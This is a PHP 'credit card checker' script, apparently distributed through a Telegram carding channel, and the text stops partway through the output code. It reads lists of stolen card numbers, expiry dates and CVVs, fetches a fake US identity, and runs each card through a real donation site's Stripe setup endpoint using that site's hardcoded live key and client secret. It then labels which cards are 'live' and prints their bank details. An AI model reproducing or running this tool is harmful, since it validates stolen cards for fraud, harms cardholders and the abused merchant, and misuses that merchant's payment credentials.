<?php


/// Made by ★𝙏𝙊𝙉𝘼𝙈𝙄★
/// Join @KurdishAccounts for more...


error_reporting(0);
set_time_limit(0);
error_reporting(0);
date_default_timezone_set('America/Buenos_Aires');


function multiexplode($delimiters, $string)
{
  $one = str_replace($delimiters, $delimiters[0], $string);
  $two = explode($delimiters[0], $one);
  return $two;
}
$lista = $_GET['lista'];
$cc = multiexplode(array(":", "|", ""), $lista)[0];
$mon = multiexplode(array(":", "|", ""), $lista)[1];
$year = multiexplode(array(":", "|", ""), $lista)[2];
$cvv = multiexplode(array(":", "|", ""), $lista)[3];

function GetStr($string, $start, $end)
{
  $str = explode($start, $string);
  $str = explode($end, $str[1]);
  return $str[0];
}
////////////////////////////===[Randomizing Details Api]

$get = file_get_contents('https://randomuser.me/api/1.2/?nat=us');
preg_match_all("(\"first\":\"(.*)\")siU", $get, $matches1);
$first = $matches1[1][0];
preg_match_all("(\"last\":\"(.*)\")siU", $get, $matches1);
$last = $matches1[1][0];
preg_match_all("(\"email\":\"(.*)\")siU", $get, $matches1);
$email = $matches1[1][0];
preg_match_all("(\"street\":\"(.*)\")siU", $get, $matches1);
$street = $matches1[1][0];
preg_match_all("(\"city\":\"(.*)\")siU", $get, $matches1);
$city = $matches1[1][0];
preg_match_all("(\"state\":\"(.*)\")siU", $get, $matches1);
$state = $matches1[1][0];
preg_match_all("(\"phone\":\"(.*)\")siU", $get, $matches1);
$phone = $matches1[1][0];
preg_match_all("(\"postcode\":(.*),\")siU", $get, $matches1);
$zip = $matches1[1][0];
/////////////////////////////////////BIN LOOKUP START////////////////////////////////////////////////////////////////
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, 'https://lookup.binlist.net/'.$cc.'');
curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
'Host: lookup.binlist.net',
'Cookie: _ga=GA1.2.549903363.1545240628; _gid=GA1.2.82939664.1545240628',
'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8'
));
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, '');
$fim = curl_exec($ch);

$bank = getStr($fim, '"bank":{"name":"', '"');
$name = getStr($fim, '"name":"', '"');
$brand = getStr($fim, '"brand":"', '"');
$country = getStr($fim, '"country":{"name":"', '"');
$scheme = getStr($fim, '"scheme":"', '"');
$currency = getStr($fim, '"currency":"', '"');
$emoji = getStr($fim, '"emoji":"', '"');
$type = getStr($fim, '"type":"', '"');

 if(strpos($fim, '"type":"credit"') !== false) {
  $bin = 'Credito';
} else {
  $bin = 'Debito';
}
/////////////////////////////////////BIN LOOKUP END////////////////////////////////////////////////////////////////

//---------------------------------------------------------------------------------------------------------------------------------------------//

////////////////////////////////////===[For Authorizing Cards]////////////////////////////////////////////////////
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, 'https://api.stripe.com/v1/setup_intents/seti_1HeDL6JEIm6BUIuDwBchrlqn/confirm');
curl_setopt($curl, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
'Host: api.stripe.com',
'Accept: application/json',
'Accept-Language: gzip, deflate, br',
'Content-Type: application/x-www-form-urlencoded',
'Origin: https://js.stripe.com',
'Referer: https://js.stripe.com/'));
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd().'/cookie.txt');
curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd().'/cookie.txt');
//=============================================================================================================================================//
//=============================================================================================================================================//
curl_setopt($ch, CURLOPT_POSTFIELDS, 'payment_method_data[type]=card&payment_method_data[billing_details][name]='.$name.'+'.$last.'&payment_method_data[card][number]='.$cc.'&payment_method_data[card][cvc]='.$cvv.'&payment_method_data[card][exp_month]='.$mon.'&payment_method_data[card][exp_year]='.$year.'&payment_method_data[guid]=879d98f3-5ad5-478c-81f5-5f939e8398e0383dde&payment_method_data[muid]=f7d7be30-9e13-4377-966c-f822c55483140e701d&payment_method_data[sid]=2991c7c9-2ca7-4966-8963-daf5fbd74a8cebb214&payment_method_data[pasted_fields]=number&payment_method_data[payment_user_agent]=stripe.js%2F3dff6f47%3B+stripe-js-v3%2F3dff6f47&payment_method_data[time_on_page]=118902&payment_method_data[referrer]=https%3A%2F%2Fbetterlivingyogaonline.com%2F&expected_payment_method_type=card&use_stripe_sdk=true&key=pk_live_1RiHlt7VCfAMWUpR47z4NzCu00FfCb29ZO&client_secret=seti_1HeDL6JEIm6BUIuDwBchrlqn_secret_IEgiwsnLCsmKbaJfAk4UkvwHMlubkd5');
//=============================================================================================================================================//
//=============================================================================================================================================//
$result = curl_exec($ch);
$monsage = trim(strip_tags(getStr($result,'"message":"','"')));
$info = curl_getinfo($ch);
$time = $info['total_time'];

////////////////////////////===[Card Response Start]///////////////////////////////////////////////////

if(strpos($result, '/donations/thank_you?donation_number=','' )) {
    echo '<span class="badge badge-success">#Aprovada </span></br> <span class="badge badge-success">♛</span> <span class="badge badge-success"> CC Details </span> <span class="badge badge-success">♛</span></br> <span class="badge badge-success">#Live CVV</span></br> <span class="badge badge-green">CC = '.$cc.'</span></br></b><span class="badge badge-green">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-green">CVC = '.$cvv.'</span></br><span class="badge badge-green">Code = Donation is succeeded </span></br><span class="badge badge-green">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = ★𝙏𝙊𝙉𝘼𝙈𝙄★</span></br><span class="badge badge-yellow">Telegram Username = @Tonami_YT</span></br><span class="badge badge-yellow">Channel Link = @KurdishAccounts</span></br><span class="badge badge-yellow">Group link = </span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/Tonami2410</span></br></br><span class="badge badge-red">============================================================================================</span></br></br>';
}
elseif (strpos($result, '"cvc_check": "pass"')){
    echo '<span class="badge badge-success">#Aprovada </span></br> <span class="badge badge-success">♛</span> <span class="badge badge-success"> CC Details </span> <span class="badge badge-success">♛</span></br> <span class="badge badge-success">#Live CVV</span></br> <span class="badge badge-green">CC = '.$cc.'</span></br></b><span class="badge badge-green">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-green">CVC = '.$cvv.'</span></br><span class="badge badge-green">Code = CVC Check Pass </span></br><span class="badge badge-green">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = ★𝙏𝙊𝙉𝘼𝙈𝙄★</span></br><span class="badge badge-yellow">Telegram Username = @Tonami_YT</span></br><span class="badge badge-yellow">Channel Link = @KurdishAccounts</span></br><span class="badge badge-yellow">Group link = </span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/Tonami2410</span></br></br><span class="badge badge-red">============================================================================================</span></br></br>';
}
elseif (strpos($result, "Thank You For Donation." )) {
    echo '<span class="badge badge-success">#Aprovada </span></br> <span class="badge badge-success">♛</span> <span class="badge badge-success"> CC Details </span> <span class="badge badge-success">♛</span></br> <span class="badge badge-success">#Live CVV</span></br> <span class="badge badge-green">CC = '.$cc.'</span></br></b><span class="badge badge-green">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-green">CVC = '.$cvv.'</span></br><span class="badge badge-green">Code = Donation is succeeded </span></br><span class="badge badge-green">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = ★𝙏𝙊𝙉𝘼𝙈𝙄★</span></br><span class="badge badge-yellow">Telegram Username = @Tonami_YT</span></br><span class="badge badge-yellow">Channel Link = @KurdishAccounts</span></br><span class="badge badge-yellow">Group link = </span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/Tonami2410</span></br></br><span class="badge badge-red">============================================================================================</span></br></br>';
}
elseif (strpos($result, "Thank You." )) {
    echo '<span class="badge badge-success">#Aprovada </span></br> <span class="badge badge-success">♛</span> <span class="badge badge-success"> CC Details </span> <span class="badge badge-success">♛</span></br> <span class="badge badge-success">#Live CVV</span></br> <span class="badge badge-green">CC = '.$cc.'</span></br></b><span class="badge badge-green">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-green">CVC = '.$cvv.'</span></br><span class="badge badge-green">Code = Donation is succeeded </span></br><span class="badge badge-green">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = ★𝙏𝙊𝙉𝘼𝙈𝙄★</span></br><span class="badge badge-yellow">Telegram Username = @Tonami_YT</span></br><span class="badge badge-yellow">Channel Link = @KurdishAccounts</span></br><span class="badge badge-yellow">Group link = </span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/Tonami2410</span></br></br><span class="badge badge-red">============================================================================================</span></br></br>';
}
elseif (strpos($result,'"status": "succeeded"')){
    echo '<span class="badge badge-success">#Aprovada </span></br> <span class="badge badge-success">♛</span> <span class="badge badge-success"> CC Details </span> <span class="badge badge-success">♛</span></br> <span class="badge badge-success">#Live CVV</span></br> <span class="badge badge-green">CC = '.$cc.'</span></br></b><span class="badge badge-green">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-green">CVC = '.$cvv.'</span></br><span class="badge badge-green">Code = Succeeded </span></br><span class="badge badge-green">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = ★𝙏𝙊𝙉𝘼𝙈𝙄★</span></br><span class="badge badge-yellow">Telegram Username = @Tonami_YT</span></br><span class="badge badge-yellow">Channel Link = @KurdishAccounts</span></br><span class="badge badge-yellow">Group link = </span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/Tonami2410</span></br></br><span class="badge badge-red">============================================================================================</span></br></br>';
}
elseif (strpos($result, 'Your card zip code is incorrect.' )) {
    echo '<span class="badge badge-success">#Aprovada </span></br> <span class="badge badge-success">♛</span> <span class="badge badge-success"> CC Details </span> <span class="badge badge-success">♛</span></br> <span class="badge badge-success">#Live CVV</span></br> <span class="badge badge-green">CC = '.$cc.'</span></br></b><span class="badge badge-green">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-green">CVC = '.$cvv.'</span></br><span class="badge badge-green">Code = Your card zip code is incorrect </span></br><span class="badge badge-green">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = ★𝙏𝙊𝙉𝘼𝙈𝙄★</span></br><span class="badge badge-yellow">Telegram Username = @Tonami_YT</span></br><span class="badge badge-yellow">Channel Link = @KurdishAccounts</span></br><span class="badge badge-yellow">Group link = </span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/Tonami2410</span></br></br><span class="badge badge-red">============================================================================================</span></br></br>';
}
elseif (strpos($result, "incorrect_zip" )) {
    echo '<span class="badge badge-success">#Aprovada </span></br> <span class="badge badge-success">♛</span> <span class="badge badge-success"> CC Details </span> <span class="badge badge-success">♛</span></br> <span class="badge badge-success">#Live CVV</span></br> <span class="badge badge-green">CC = '.$cc.'</span></br></b><span class="badge badge-green">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-green">CVC = '.$cvv.'</span></br><span class="badge badge-green">Code = Incorrect Zip </span></br><span class="badge badge-green">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = ★𝙏𝙊𝙉𝘼𝙈𝙄★</span></br><span class="badge badge-yellow">Telegram Username = @Tonami_YT</span></br><span class="badge badge-yellow">Channel Link = @KurdishAccounts</span></br><span class="badge badge-yellow">Group link = </span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/Tonami2410</span></br></br><span class="badge badge-red">============================================================================================</span></br></br>';
}
elseif (strpos($result, "Your payment has already been processed")) {
  echo '<span class="badge badge-success">#Aprovada </span></br> <span class="badge badge-success">♛</span> <span class="badge badge-success"> CC Details </span> <span class="badge badge-success">♛</span></br> <span class="badge badge-success">#Live CVV</span></br> <span class="badge badge-green">CC = '.$cc.'</span></br></b><span class="badge badge-green">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-green">CVC = '.$cvv.'</span></br><span class="badge badge-green">Code = Your payment has already been processed </span></br><span class="badge badge-green">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = ★𝙏𝙊𝙉𝘼𝙈𝙄★</span></br><span class="badge badge-yellow">Telegram Username = @Tonami_YT</span></br><span class="badge badge-yellow">Channel Link = @KurdishAccounts</span></br><span class="badge badge-yellow">Group link = </span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/Tonami2410</span></br></br><span class="badge badge-red">============================================================================================</span></br></br>';
}
elseif (strpos($result,"The zip code you supplied failed validation.")){
    echo '<span class="badge badge-success">#Aprovada </span></br> <span class="badge badge-success">♛</span> <span class="badge badge-success"> CC Details </span> <span class="badge badge-success">♛</span></br> <span class="badge badge-success">#Live CVV</span></br> <span class="badge badge-green">CC = '.$cc.'</span></br></b><span class="badge badge-green">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-green">CVC = '.$cvv.'</span></br><span class="badge badge-green">Code = The zip code you supplied failed validation </span></br><span class="badge badge-green">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = ★𝙏𝙊𝙉𝘼𝙈𝙄★</span></br><span class="badge badge-yellow">Telegram Username = @Tonami_YT</span></br><span class="badge badge-yellow">Channel Link = @KurdishAccounts</span></br><span class="badge badge-yellow">Group link = </span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/Tonami2410</span></br></br><span class="badge badge-red">============================================================================================</span></br></br>';
}
elseif (strpos($result, "Success" )) {
    echo '<span class="badge badge-success">#Aprovada </span></br> <span class="badge badge-success">♛</span> <span class="badge badge-success"> CC Details </span> <span class="badge badge-success">♛</span></br> <span class="badge badge-success">#Live CVV</span></br> <span class="badge badge-green">CC = '.$cc.'</span></br></b><span class="badge badge-green">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-green">CVC = '.$cvv.'</span></br><span class="badge badge-green">Code = Success </span></br><span class="badge badge-green">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = ★𝙏𝙊𝙉𝘼𝙈𝙄★</span></br><span class="badge badge-yellow">Telegram Username = @Tonami_YT</span></br><span class="badge badge-yellow">Channel Link = @KurdishAccounts</span></br><span class="badge badge-yellow">Group link = </span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/Tonami2410</span></br></br><span class="badge badge-red">============================================================================================</span></br></br>';
}
elseif (strpos($result, "succeeded." )) {
    echo '<span class="badge badge-success">#Aprovada </span></br> <span class="badge badge-success">♛</span> <span class="badge badge-success"> CC Details </span> <span class="badge badge-success">♛</span></br> <span class="badge badge-success">#Live CVV</span></br> <span class="badge badge-green">CC = '.$cc.'</span></br></b><span class="badge badge-green">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-green">CVC = '.$cvv.'</span></br><span class="badge badge-green">Code = Succeeded </span></br><span class="badge badge-green">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = ★𝙏𝙊𝙉𝘼𝙈𝙄★</span></br><span class="badge badge-yellow">Telegram Username = @Tonami_YT</span></br><span class="badge badge-yellow">Channel Link = @KurdishAccounts</span></br><span class="badge badge-yellow">Group link = </span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/Tonami2410</span></br></br><span class="badge badge-red">============================================================================================</span></br></br>';
}
elseif (strpos($result,'"type":"one-time"')){
    echo '<span class="badge badge-success">#Aprovada </span></br> <span class="badge badge-success">♛</span> <span class="badge badge-success"> CC Details </span> <span class="badge badge-success">♛</span></br> <span class="badge badge-success">#Live CVV</span></br> <span class="badge badge-green">CC = '.$cc.'</span></br></b><span class="badge badge-green">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-green">CVC = '.$cvv.'</span></br><span class="badge badge-green">Code = One Time </span></br><span class="badge badge-green">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = ★𝙏𝙊𝙉𝘼𝙈𝙄★</span></br><span class="badge badge-yellow">Telegram Username = @Tonami_YT</span></br><span class="badge badge-yellow">Channel Link = @KurdishAccounts</span></br><span class="badge badge-yellow">Group link = </span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/Tonami2410</span></br></br><span class="badge badge-red">============================================================================================</span></br></br>';
}
elseif (strpos($result, 'Your card has insufficient funds.')) {
    echo '<span class="badge badge-success">#Aprovada </span></br> <span class="badge badge-success">♛</span> <span class="badge badge-success"> CC Details </span> <span class="badge badge-success">♛</span></br> <span class="badge badge-success">#Live Card</span></br> <span class="badge badge-green">CC = '.$cc.'</span></br></b><span class="badge badge-green">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-green">CVC = '.$cvv.'</span></br><span class="badge badge-green">Code = Insufficient Funds </span></br><span class="badge badge-green">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = ★𝙏𝙊𝙉𝘼𝙈𝙄★</span></br><span class="badge badge-yellow">Telegram Username = @Tonami_YT</span></br><span class="badge badge-yellow">Channel Link = @KurdishAccounts</span></br><span class="badge badge-yellow">Group link = </span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/Tonami2410</span></br></br><span class="badge badge-red">============================================================================================</span></br></br>';
}
elseif (strpos($result, "insufficient_funds")) {
    echo '<span class="badge badge-success">#Aprovada </span></br> <span class="badge badge-success">♛</span> <span class="badge badge-success"> CC Details </span> <span class="badge badge-success">♛</span></br> <span class="badge badge-success">#Live Card</span></br> <span class="badge badge-green">CC = '.$cc.'</span></br></b><span class="badge badge-green">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-green">CVC = '.$cvv.'</span></br><span class="badge badge-green">Code = Insufficient Funds </span></br><span class="badge badge-green">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = ★𝙏𝙊𝙉𝘼𝙈𝙄★</span></br><span class="badge badge-yellow">Telegram Username = @Tonami_YT</span></br><span class="badge badge-yellow">Channel Link = @KurdishAccounts</span></br><span class="badge badge-yellow">Group link = </span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/Tonami2410</span></br></br><span class="badge badge-red">============================================================================================</span></br></br>';
}
elseif (strpos($result, "lost_card" )) {
    echo '<span class="badge badge-success">#Aprovada </span></br> <span class="badge badge-success">♛</span> <span class="badge badge-success"> CC Details </span> <span class="badge badge-success">♛</span></br> <span class="badge badge-success">#Live CCN</span></br> <span class="badge badge-green">CC = '.$cc.'</span></br></b><span class="badge badge-green">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-green">CVC = '.$cvv.'</span></br><span class="badge badge-green">Code = Lost Card </span></br><span class="badge badge-green">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details 